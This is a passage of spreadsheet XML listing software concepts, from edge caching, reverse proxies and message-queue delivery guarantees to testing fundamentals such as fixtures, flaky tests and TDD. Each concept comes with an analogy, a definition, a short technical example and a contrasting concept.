      <c r="H888" t="inlineStr">
        <is>
          <t>Newspaper printed in regional plants</t>
        </is>
      </c>
      <c r="J888" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K888" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" t="n">
        <v>0</v>
      </c>
      <c r="B889" t="inlineStr">
        <is>
          <t>887</t>
        </is>
      </c>
      <c r="C889" t="inlineStr">
        <is>
          <t>Edge caching &amp; invalidation</t>
        </is>
      </c>
      <c r="D889" t="inlineStr">
        <is>
          <t>Corkboards in every city square, posters glued with dated varnish: year-long varnish for numbered art prints (hashed assets), one-minute paste for headlines — plus a 'purge!' hotline to steam posters off early.</t>
        </is>
      </c>
      <c r="E889" t="inlineStr">
        <is>
          <t>Edge caches obey TTLs and purge APIs: fingerprinted immutable assets cache forever, HTML stays short-lived — invalidation is the hard part.</t>
        </is>
      </c>
      <c r="F889" t="inlineStr">
        <is>
          <t>app.3f9c.js: max-age=31536000, immutable; index.html: max-age=60; each deploy purges /index.html</t>
        </is>
      </c>
      <c r="G889" t="inlineStr">
        <is>
          <t>Browser cache — one private copy per user; edge caches are shared across users and centrally purgeable.</t>
        </is>
      </c>
      <c r="H889" t="inlineStr">
        <is>
          <t>Milk delivery routes with expiry stamps</t>
        </is>
      </c>
      <c r="J889" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K889" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" t="n">
        <v>0</v>
      </c>
      <c r="B890" t="inlineStr">
        <is>
          <t>888</t>
        </is>
      </c>
      <c r="C890" t="inlineStr">
        <is>
          <t>Reverse proxy</t>
        </is>
      </c>
      <c r="D890" t="inlineStr">
        <is>
          <t>A butler answering the mansion's single front door: he takes every visitor's coat (TLS), decides which wing serves them, and no guest ever learns the servants' corridors.</t>
        </is>
      </c>
      <c r="E890" t="inlineStr">
        <is>
          <t>A server in front of your backends terminating TLS and forwarding requests — one place for routing, compression, caching, and shielding origins.</t>
        </is>
      </c>
      <c r="F890" t="inlineStr">
        <is>
          <t>nginx: listen 443 ssl; location /api { proxy_pass http://backend:3000; }</t>
        </is>
      </c>
      <c r="G890" t="inlineStr">
        <is>
          <t>Forward proxy — sits in front of CLIENTS hiding them from servers; a reverse proxy fronts servers hiding them from clients.</t>
        </is>
      </c>
      <c r="H890" t="inlineStr">
        <is>
          <t>Restaurant pass window between kitchen and floor</t>
        </is>
      </c>
      <c r="J890" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K890" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" t="n">
        <v>0</v>
      </c>
      <c r="B891" t="inlineStr">
        <is>
          <t>889</t>
        </is>
      </c>
      <c r="C891" t="inlineStr">
        <is>
          <t>Autoscaling</t>
        </is>
      </c>
      <c r="D891" t="inlineStr">
        <is>
          <t>An accordion band that hires extra players mid-song as the crowd swells and quietly sends them home at midnight — the sheet music (target: 60% CPU) conducts the hiring.</t>
        </is>
      </c>
      <c r="E891" t="inlineStr">
        <is>
          <t>The platform adds or removes instances from metrics (CPU, queue depth, RPS) toward a target — capacity follows demand within min/max bounds.</t>
        </is>
      </c>
      <c r="F891" t="inlineStr">
        <is>
          <t>k8s HPA: target 60% CPU, min 3, max 30 replicas; scale up fast, scale down slowly to avoid flapping</t>
        </is>
      </c>
      <c r="G891" t="inlineStr">
        <is>
          <t>Load balancing — spreads traffic across existing capacity; autoscaling changes how much capacity exists.</t>
        </is>
      </c>
      <c r="H891" t="inlineStr">
        <is>
          <t>Thermostat-controlled staffing</t>
        </is>
      </c>
      <c r="J891" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K891" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" t="n">
        <v>0</v>
      </c>
      <c r="B892" t="inlineStr">
        <is>
          <t>890</t>
        </is>
      </c>
      <c r="C892" t="inlineStr">
        <is>
          <t>Message queue decoupling</t>
        </is>
      </c>
      <c r="D892" t="inlineStr">
        <is>
          <t>A restaurant order rail: waiters clip tickets and rush off; cooks pull tickets when a burner frees up. Neither waits staring at the other, and the rail absorbs the lunch rush.</t>
        </is>
      </c>
      <c r="E892" t="inlineStr">
        <is>
          <t>Producers enqueue and move on; consumers process at their own pace — the broker buffers bursts and decouples uptime and speed of both sides.</t>
        </is>
      </c>
      <c r="F892" t="inlineStr">
        <is>
          <t>checkout -&gt; SQS 'orders' -&gt; email worker; email service down 1h means a backlog, not lost sales</t>
        </is>
      </c>
      <c r="G892" t="inlineStr">
        <is>
          <t>Synchronous RPC — the caller blocks on the callee's health and speed; a queue converts calls into buffered work.</t>
        </is>
      </c>
      <c r="H892" t="inlineStr">
        <is>
          <t>Bakery take-a-number spool</t>
        </is>
      </c>
      <c r="J892" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K892" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" t="n">
        <v>0</v>
      </c>
      <c r="B893" t="inlineStr">
        <is>
          <t>891</t>
        </is>
      </c>
      <c r="C893" t="inlineStr">
        <is>
          <t>Queue vs log (Kafka)</t>
        </is>
      </c>
      <c r="D893" t="inlineStr">
        <is>
          <t>A paper-shredder inbox (queue: read it, shred it) vs a ship captain's logbook (log: entries eternal, each officer reading with their own bookmark, free to flip back years).</t>
        </is>
      </c>
      <c r="E893" t="inlineStr">
        <is>
          <t>A queue deletes each message once consumed; a log appends immutably and consumers track their own offsets — a replayable multi-reader history.</t>
        </is>
      </c>
      <c r="F893" t="inlineStr">
        <is>
          <t>RabbitMQ: message gone after ack; Kafka: 7-day retention, a new consumer replays from offset 0</t>
        </is>
      </c>
      <c r="G893" t="inlineStr">
        <is>
          <t>A queue emulated on Kafka — retention and compaction differ; the log's essence is consumer-owned offsets over immutable records.</t>
        </is>
      </c>
      <c r="H893" t="inlineStr">
        <is>
          <t>Chalkboard vs stone inscription</t>
        </is>
      </c>
      <c r="J893" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K893" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" t="n">
        <v>0</v>
      </c>
      <c r="B894" t="inlineStr">
        <is>
          <t>892</t>
        </is>
      </c>
      <c r="C894" t="inlineStr">
        <is>
          <t>Consumer groups</t>
        </is>
      </c>
      <c r="D894" t="inlineStr">
        <is>
          <t>Two rival newspaper crews at one printing press: within a crew, reporters divide the city's districts (partitions); each crew still covers the WHOLE city on its own.</t>
        </is>
      </c>
      <c r="E894" t="inlineStr">
        <is>
          <t>Consumers sharing a group id split a topic's partitions among themselves for parallelism; separate groups each get the full stream independently.</t>
        </is>
      </c>
      <c r="F894" t="inlineStr">
        <is>
          <t>Topic with 12 partitions, group 'billing' has 3 consumers so 4 partitions each; group 'audit' also reads all 12</t>
        </is>
      </c>
      <c r="G894" t="inlineStr">
        <is>
          <t>Competing consumers on one queue — same work-splitting, but groups add per-group full-stream fan-out.</t>
        </is>
      </c>
      <c r="H894" t="inlineStr">
        <is>
          <t>Trivia teams splitting question categories</t>
        </is>
      </c>
      <c r="J894" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K894" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" t="n">
        <v>0</v>
      </c>
      <c r="B895" t="inlineStr">
        <is>
          <t>893</t>
        </is>
      </c>
      <c r="C895" t="inlineStr">
        <is>
          <t>At-most-once delivery</t>
        </is>
      </c>
      <c r="D895" t="inlineStr">
        <is>
          <t>A waiter who shreds the order ticket the instant he tears it off the rail — trip on the way to the kitchen and that table's dinner simply never existed.</t>
        </is>
      </c>
      <c r="E895" t="inlineStr">
        <is>
          <t>Fire-and-forget or ack-before-processing: no duplicates ever, but a crash between receive and process silently loses the message.</t>
        </is>
      </c>
      <c r="F895" t="inlineStr">
        <is>
          <t>Consumer commits the offset, THEN processes; crash mid-process and the message is never seen again</t>
        </is>
      </c>
      <c r="G895" t="inlineStr">
        <is>
          <t>At-least-once — flips the order (process, then ack): nothing lost, duplicates possible.</t>
        </is>
      </c>
      <c r="H895" t="inlineStr">
        <is>
          <t>Message in a bottle</t>
        </is>
      </c>
      <c r="J895" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K895" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" t="n">
        <v>0</v>
      </c>
      <c r="B896" t="inlineStr">
        <is>
          <t>894</t>
        </is>
      </c>
      <c r="C896" t="inlineStr">
        <is>
          <t>At-least-once delivery</t>
        </is>
      </c>
      <c r="D896" t="inlineStr">
        <is>
          <t>A nagging courier who redelivers the parcel every day until you sign: miss his visit and tomorrow brings the same box — sometimes two, so check your shelf before unboxing.</t>
        </is>
      </c>
      <c r="E896" t="inlineStr">
        <is>
          <t>Ack only after processing; failures cause redelivery, so nothing is lost but duplicates arrive — consumers must be idempotent.</t>
        </is>
      </c>
      <c r="F896" t="inlineStr">
        <is>
          <t>process(msg) THEN commit offset; crash between the two means redelivery on restart; handler dedupes by id</t>
        </is>
      </c>
      <c r="G896" t="inlineStr">
        <is>
          <t>At-most-once — acks first and risks loss; at-least-once risks repeats instead, and is the usual default.</t>
        </is>
      </c>
      <c r="H896" t="inlineStr">
        <is>
          <t>Alarm clock with relentless snooze</t>
        </is>
      </c>
      <c r="J896" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K896" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" t="n">
        <v>0</v>
      </c>
      <c r="B897" t="inlineStr">
        <is>
          <t>895</t>
        </is>
      </c>
      <c r="C897" t="inlineStr">
        <is>
          <t>Exactly-once processing</t>
        </is>
      </c>
      <c r="D897" t="inlineStr">
        <is>
          <t>The relentless courier again — but your door keeps a signature ledger: second identical parcel, one glance at the ledger, no signature, and the effects happen once no matter how many knocks.</t>
        </is>
      </c>
      <c r="E897" t="inlineStr">
        <is>
          <t>Effectively-once: at-least-once delivery made harmless via idempotent writes, dedup keys, or transactions spanning processing and offset commit.</t>
        </is>
      </c>
      <c r="F897" t="inlineStr">
        <is>
          <t>Kafka transactions: consume-process-produce with offsets committed atomically; or UPSERT keyed by event id</t>
        </is>
      </c>
      <c r="G897" t="inlineStr">
        <is>
          <t>Exactly-once DELIVERY — impossible over lossy networks; you engineer once-only EFFECTS, not once-only arrival.</t>
        </is>
      </c>
      <c r="H897" t="inlineStr">
        <is>
          <t>Turnstile accepting each ticket once</t>
        </is>
      </c>
      <c r="J897" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K897" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" t="n">
        <v>0</v>
      </c>
      <c r="B898" t="inlineStr">
        <is>
          <t>896</t>
        </is>
      </c>
      <c r="C898" t="inlineStr">
        <is>
          <t>Ordering &amp; partitions</t>
        </is>
      </c>
      <c r="D898" t="inlineStr">
        <is>
          <t>A bank with a separate teller line per surname letter: everything for 'Smith' happens in strict order in the S line, but whether Smith or Jones goes first overall, nobody can say.</t>
        </is>
      </c>
      <c r="E898" t="inlineStr">
        <is>
          <t>Kafka guarantees order only within a partition; same key means same partition means ordered — global order across partitions doesn't exist.</t>
        </is>
      </c>
      <c r="F898" t="inlineStr">
        <is>
          <t>key=account_id keeps each account's events ordered; events across accounts interleave arbitrarily</t>
        </is>
      </c>
      <c r="G898" t="inlineStr">
        <is>
          <t>Total ordering — needs a single partition (killing parallelism) or consensus; per-key order is the scalable contract.</t>
        </is>
      </c>
      <c r="H898" t="inlineStr">
        <is>
          <t>Multiple checkout lanes, orderly within each</t>
        </is>
      </c>
      <c r="J898" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K898" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" t="n">
        <v>0</v>
      </c>
      <c r="B899" t="inlineStr">
        <is>
          <t>897</t>
        </is>
      </c>
      <c r="C899" t="inlineStr">
        <is>
          <t>Dead-letter queue</t>
        </is>
      </c>
      <c r="D899" t="inlineStr">
        <is>
          <t>The post office's dead-letter room: after three failed deliveries the cursed parcel goes to a shelf under a bare bulb where an inspector opens it with tongs — and the trucks keep rolling.</t>
        </is>
      </c>
      <c r="E899" t="inlineStr">
        <is>
          <t>Messages failing after N processing attempts are parked in a side queue for inspection and replay, so one poison message can't block the pipeline.</t>
        </is>
      </c>
      <c r="F899" t="inlineStr">
        <is>
          <t>SQS redrive policy: maxReceiveCount=3 sends to DLQ; alarm on DLQ depth; replay after the bugfix</t>
        </is>
      </c>
      <c r="G899" t="inlineStr">
        <is>
          <t>Retry queue — delayed re-attempts still bound for the main flow; the DLQ is the terminal quarantine.</t>
        </is>
      </c>
      <c r="H899" t="inlineStr">
        <is>
          <t>Island of misfit toys</t>
        </is>
      </c>
      <c r="J899" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K899" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" t="n">
        <v>0</v>
      </c>
      <c r="B900" t="inlineStr">
        <is>
          <t>898</t>
        </is>
      </c>
      <c r="C900" t="inlineStr">
        <is>
          <t>Outbox pattern</t>
        </is>
      </c>
      <c r="D900" t="inlineStr">
        <is>
          <t>A merchant who, in the same pen stroke, records the sale in his ledger AND drops a sealed letter in the shop's outbox tray; the mail boy empties the tray on his rounds — ledger and letters can never disagree.</t>
        </is>
      </c>
      <c r="E900" t="inlineStr">
        <is>
          <t>Write the business change and an outbox event row in one DB transaction; a relay publishes rows to the broker — no dual-write inconsistency.</t>
        </is>
      </c>
      <c r="F900" t="inlineStr">
        <is>
          <t>BEGIN; INSERT order; INSERT outbox(event); COMMIT; then Debezium or a poller ships outbox rows to Kafka</t>
        </is>
      </c>
      <c r="G900" t="inlineStr">
        <is>
          <t>Dual write (DB then publish) — a crash between the two writes loses or orphans the event; the outbox rides one transaction.</t>
        </is>
      </c>
      <c r="H900" t="inlineStr">
        <is>
          <t>Carbon-copy receipt book</t>
        </is>
      </c>
      <c r="J900" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K900" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" t="n">
        <v>0</v>
      </c>
      <c r="B901" t="inlineStr">
        <is>
          <t>899</t>
        </is>
      </c>
      <c r="C901" t="inlineStr">
        <is>
          <t>Consumer lag</t>
        </is>
      </c>
      <c r="D901" t="inlineStr">
        <is>
          <t>A treadmill piling unread newspapers at its end faster than you read: the teetering stack's height IS your lag, and it either shrinks or buries you.</t>
        </is>
      </c>
      <c r="E901" t="inlineStr">
        <is>
          <t>The gap between the log's newest offset and a group's committed offset — the backlog metric showing consumers aren't keeping up.</t>
        </is>
      </c>
      <c r="F901" t="inlineStr">
        <is>
          <t>kafka-consumer-groups --describe shows LAG 1240000 on partition 3: add consumers or fix the slow handler</t>
        </is>
      </c>
      <c r="G901" t="inlineStr">
        <is>
          <t>Replication lag — followers behind a leader database; consumer lag is processing behind the head of a stream.</t>
        </is>
      </c>
      <c r="H901" t="inlineStr">
        <is>
          <t>Unread-email badge climbing</t>
        </is>
      </c>
      <c r="J901" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K901" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" t="n">
        <v>0</v>
      </c>
      <c r="B902" t="inlineStr">
        <is>
          <t>900</t>
        </is>
      </c>
      <c r="C902" t="inlineStr">
        <is>
          <t>Regression safety net</t>
        </is>
      </c>
      <c r="D902" t="inlineStr">
        <is>
          <t>A trapeze artist refactors in mid-air above a net woven from every bug ever fixed; one wrong move and the net snaps taut, catching the fall before it hits production.</t>
        </is>
      </c>
      <c r="E902" t="inlineStr">
        <is>
          <t>An automated test suite that reruns past expectations on every change, catching reintroduced bugs before they reach users.</t>
        </is>
      </c>
      <c r="F902" t="inlineStr">
        <is>
          <t>npm test runs on every push / 2,400 tests replay all past expectations in 90s / old bug #512 has a test pinning its fix forever</t>
        </is>
      </c>
      <c r="G902" t="inlineStr">
        <is>
          <t>Manual QA pass - the net is automated and reruns on EVERY change, not a human sweep before release.</t>
        </is>
      </c>
      <c r="H902" t="inlineStr">
        <is>
          <t>A ratchet that clicks forward and never slips back.</t>
        </is>
      </c>
      <c r="J902" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K902" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" t="n">
        <v>0</v>
      </c>
      <c r="B903" t="inlineStr">
        <is>
          <t>901</t>
        </is>
      </c>
      <c r="C903" t="inlineStr">
        <is>
          <t>Test pyramid</t>
        </is>
      </c>
      <c r="D903" t="inlineStr">
        <is>
          <t>An Egyptian pyramid: thousands of tiny cheap bricks (unit tests) form the base, a few huge slow granite slabs (E2E) sit at the tip. Build it upside-down and it topples.</t>
        </is>
      </c>
      <c r="E903" t="inlineStr">
        <is>
          <t>Strategy of many fast unit tests at the base, fewer integration tests in the middle, and very few slow end-to-end tests at the top.</t>
        </is>
      </c>
      <c r="F903" t="inlineStr">
        <is>
          <t>700 unit / 80 integration / 10 E2E / unit: milliseconds each; E2E: minutes each / inverted 'ice-cream cone' suites crawl and flake</t>
        </is>
      </c>
      <c r="G903" t="inlineStr">
        <is>
          <t>Ice-cream cone anti-pattern - the inverted shape: mostly manual and E2E tests balanced on few unit tests.</t>
        </is>
      </c>
      <c r="H903" t="inlineStr">
        <is>
          <t>A food pyramid with unit-test grains at the bottom.</t>
        </is>
      </c>
      <c r="J903" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K903" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" t="n">
        <v>0</v>
      </c>
      <c r="B904" t="inlineStr">
        <is>
          <t>902</t>
        </is>
      </c>
      <c r="C904" t="inlineStr">
        <is>
          <t>Unit, integration, E2E tests</t>
        </is>
      </c>
      <c r="D904" t="inlineStr">
        <is>
          <t>Testing a car: the spark plug fires alone on the bench (unit), the assembled engine roars on the stand (integration), then a driver takes the whole car around the block (E2E).</t>
        </is>
      </c>
      <c r="E904" t="inlineStr">
        <is>
          <t>Test scopes: unit checks one piece in isolation, integration checks pieces wired together, end-to-end drives the whole system like a user.</t>
        </is>
      </c>
      <c r="F904" t="inlineStr">
        <is>
          <t>unit: assert add(2,3) == 5 / integration: repo saves to a real Postgres / E2E: browser clicks Buy, order row appears</t>
        </is>
      </c>
      <c r="G904" t="inlineStr">
        <is>
          <t>Integration vs E2E - integration wires SOME real parts together; E2E exercises the full deployed stack through the user interface.</t>
        </is>
      </c>
      <c r="H904" t="inlineStr">
        <is>
          <t>Russian nesting dolls of widening scope.</t>
        </is>
      </c>
      <c r="J904" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K904" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" t="n">
        <v>0</v>
      </c>
      <c r="B905" t="inlineStr">
        <is>
          <t>903</t>
        </is>
      </c>
      <c r="C905" t="inlineStr">
        <is>
          <t>Arrange-Act-Assert</t>
        </is>
      </c>
      <c r="D905" t="inlineStr">
        <is>
          <t>A three-act play: stagehands ARRANGE the props, the ACTor performs exactly one scene, then a critic stands up and ASSERTs the verdict.</t>
        </is>
      </c>
      <c r="E905" t="inlineStr">
        <is>
          <t>Three-part test structure: set up the starting state, invoke the one behavior under test, then verify the outcome.</t>
        </is>
      </c>
      <c r="F905" t="inlineStr">
        <is>
          <t>user = User(balance=100) # arrange / user.withdraw(30) # act / assert user.balance == 70 # assert</t>
        </is>
      </c>
      <c r="G905" t="inlineStr">
        <is>
          <t>Given-When-Then - the same triad in BDD wording; AAA names code sections, GWT names the spec language.</t>
        </is>
      </c>
      <c r="H905" t="inlineStr">
        <is>
          <t>Mise en place, cook, taste.</t>
        </is>
      </c>
      <c r="J905" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K905" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" t="n">
        <v>0</v>
      </c>
      <c r="B906" t="inlineStr">
        <is>
          <t>904</t>
        </is>
      </c>
      <c r="C906" t="inlineStr">
        <is>
          <t>One behavior per test</t>
        </is>
      </c>
      <c r="D906" t="inlineStr">
        <is>
          <t>A sniper's rule: one bullet, one target. When a shot misses you know precisely which target survived - unlike a shotgun blast where any pellet could have failed.</t>
        </is>
      </c>
      <c r="E906" t="inlineStr">
        <is>
          <t>Each test verifies a single behavior so a failure names exactly what broke; piles of unrelated asserts blur the diagnosis.</t>
        </is>
      </c>
      <c r="F906" t="inlineStr">
        <is>
          <t>test_withdraw_reduces_balance / test_withdraw_rejects_overdraft / not: test_withdraw_works with 12 asserts</t>
        </is>
      </c>
      <c r="G906" t="inlineStr">
        <is>
          <t>One assert per test - the stricter rule; several asserts are fine when they all check the SAME behavior.</t>
        </is>
      </c>
      <c r="H906" t="inlineStr">
        <is>
          <t>One dart per bullseye.</t>
        </is>
      </c>
      <c r="J906" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K906" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" t="n">
        <v>0</v>
      </c>
      <c r="B907" t="inlineStr">
        <is>
          <t>905</t>
        </is>
      </c>
      <c r="C907" t="inlineStr">
        <is>
          <t>Test fixtures</t>
        </is>
      </c>
      <c r="D907" t="inlineStr">
        <is>
          <t>A photo studio with lighting rigs bolted to the floor: every model (test) walks into the identical pre-built set, shoots, and the crew resets it for the next.</t>
        </is>
      </c>
      <c r="E907" t="inlineStr">
        <is>
          <t>Reusable, known-good setup - objects, data, environment - that puts each test into a fixed, predictable starting state.</t>
        </is>
      </c>
      <c r="F907" t="inlineStr">
        <is>
          <t>@pytest.fixture / def db(): return seeded_test_db() / def test_query(db): ...</t>
        </is>
      </c>
      <c r="G907" t="inlineStr">
        <is>
          <t>Factory - a fixture provides one fixed prepared state; a factory builds fresh, varied objects on demand.</t>
        </is>
      </c>
      <c r="H907" t="inlineStr">
        <is>
          <t>Bathroom fixtures pre-plumbed before tenants move in.</t>
        </is>
      </c>
      <c r="J907" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K907" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" t="n">
        <v>0</v>
      </c>
      <c r="B908" t="inlineStr">
        <is>
          <t>906</t>
        </is>
      </c>
      <c r="C908" t="inlineStr">
        <is>
          <t>Test isolation</t>
        </is>
      </c>
      <c r="D908" t="inlineStr">
        <is>
          <t>An exam hall of soundproof booths: each student (test) gets a wiped desk and cannot copy a neighbor. Shuffle the seating order and the scores never change.</t>
        </is>
      </c>
      <c r="E908" t="inlineStr">
        <is>
          <t>Tests must not share mutable state or depend on order; each runs in a fresh world so any subset passes on its own.</t>
        </is>
      </c>
      <c r="F908" t="inlineStr">
        <is>
          <t>each test gets its own tmp dir and DB transaction / shuffle order with pytest-randomly to expose coupling / a test failing alone must fail in the suite too</t>
        </is>
      </c>
      <c r="G908" t="inlineStr">
        <is>
          <t>Determinism - determinism is same result across runs; isolation is independence between tests within a run.</t>
        </is>
      </c>
      <c r="H908" t="inlineStr">
        <is>
          <t>Quarantine pods, one per test.</t>
        </is>
      </c>
      <c r="J908" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K908" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" t="n">
        <v>0</v>
      </c>
      <c r="B909" t="inlineStr">
        <is>
          <t>907</t>
        </is>
      </c>
      <c r="C909" t="inlineStr">
        <is>
          <t>Deterministic tests</t>
        </is>
      </c>
      <c r="D909" t="inlineStr">
        <is>
          <t>A metronome ticks identical beats forever: same input, same tick, whether it's midnight, a leap day, or a slow, overloaded CI box.</t>
        </is>
      </c>
      <c r="E909" t="inlineStr">
        <is>
          <t>A test that always yields the same verdict for the same code, with time, randomness, network, and concurrency under control.</t>
        </is>
      </c>
      <c r="F909" t="inlineStr">
        <is>
          <t>freeze time: clock = FakeClock(2026, 1, 1) / seed randomness: random.seed(42) / stub the network call</t>
        </is>
      </c>
      <c r="G909" t="inlineStr">
        <is>
          <t>Flaky test - the exact opposite: same code, different verdicts across runs.</t>
        </is>
      </c>
      <c r="H909" t="inlineStr">
        <is>
          <t>A vending machine: same coin, same soda, every time.</t>
        </is>
      </c>
      <c r="J909" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K909" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" t="n">
        <v>0</v>
      </c>
      <c r="B910" t="inlineStr">
        <is>
          <t>908</t>
        </is>
      </c>
      <c r="C910" t="inlineStr">
        <is>
          <t>Flaky tests</t>
        </is>
      </c>
      <c r="D910" t="inlineStr">
        <is>
          <t>A slot machine bolted into the CI room: pull the same lever on the same code and sometimes cherries, sometimes lemons - soon the team stops believing any result.</t>
        </is>
      </c>
      <c r="E910" t="inlineStr">
        <is>
          <t>A test that passes and fails nondeterministically on unchanged code, eroding trust until real failures get ignored too.</t>
        </is>
      </c>
      <c r="F910" t="inlineStr">
        <is>
          <t>sleep(2) then assert job done # loses on slow CI / team presses retry-until-green daily / fix: await the completion event, never sleep</t>
        </is>
      </c>
      <c r="G910" t="inlineStr">
        <is>
          <t>Genuinely failing test - a flake flips verdicts on identical code; a real failure is consistent and blames the change.</t>
        </is>
      </c>
      <c r="H910" t="inlineStr">
        <is>
          <t>Flaking paint that hides the wall's true color.</t>
        </is>
      </c>
      <c r="J910" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K910" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" t="n">
        <v>0</v>
      </c>
      <c r="B911" t="inlineStr">
        <is>
          <t>909</t>
        </is>
      </c>
      <c r="C911" t="inlineStr">
        <is>
          <t>Fast feedback</t>
        </is>
      </c>
      <c r="D911" t="inlineStr">
        <is>
          <t>Touch a hot stove and you learn in milliseconds; if the burn arrived tomorrow you would never connect it to the stove. Slow test suites deliver tomorrow's burns.</t>
        </is>
      </c>
      <c r="E911" t="inlineStr">
        <is>
          <t>The shorter the gap between change and verdict, the cheaper the fix; keep the core suite seconds-fast and run it constantly.</t>
        </is>
      </c>
      <c r="F911" t="inlineStr">
        <is>
          <t>watch mode reruns affected tests on save / unit suite under 10s, full CI under 10 min / slow suites get run less, so bugs age</t>
        </is>
      </c>
      <c r="G911" t="inlineStr">
        <is>
          <t>Fast tests vs fast pipeline - feedback time includes queueing and build time, not just test runtime.</t>
        </is>
      </c>
      <c r="H911" t="inlineStr">
        <is>
          <t>A boomerang that returns before you forget throwing it.</t>
        </is>
      </c>
      <c r="J911" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K911" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" t="n">
        <v>0</v>
      </c>
      <c r="B912" t="inlineStr">
        <is>
          <t>910</t>
        </is>
      </c>
      <c r="C912" t="inlineStr">
        <is>
          <t>Test-driven development (TDD)</t>
        </is>
      </c>
      <c r="D912" t="inlineStr">
        <is>
          <t>A teacher writes the exam FIRST, watches the empty classroom fail it, then teaches exactly enough for the class to pass - and not one lesson more.</t>
        </is>
      </c>
      <c r="E912" t="inlineStr">
        <is>
          <t>Workflow of writing a failing test before the code that passes it, letting tests drive design in small verified steps.</t>
        </is>
      </c>
      <c r="F912" t="inlineStr">
        <is>
          <t>1. write test_parse_empty -&gt; red / 2. implement parse() minimally -&gt; green / 3. refactor while tests stay green</t>
        </is>
      </c>
      <c r="G912" t="inlineStr">
        <is>
          <t>Test-after - TDD's failing-test-first step proves the test CAN fail and shapes the API before code exists.</t>
        </is>
      </c>
      <c r="H912" t="inlineStr">
        <is>
          <t>Forge the lock first, then cut the key to fit it.</t>
        </is>
      </c>
      <c r="J912" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
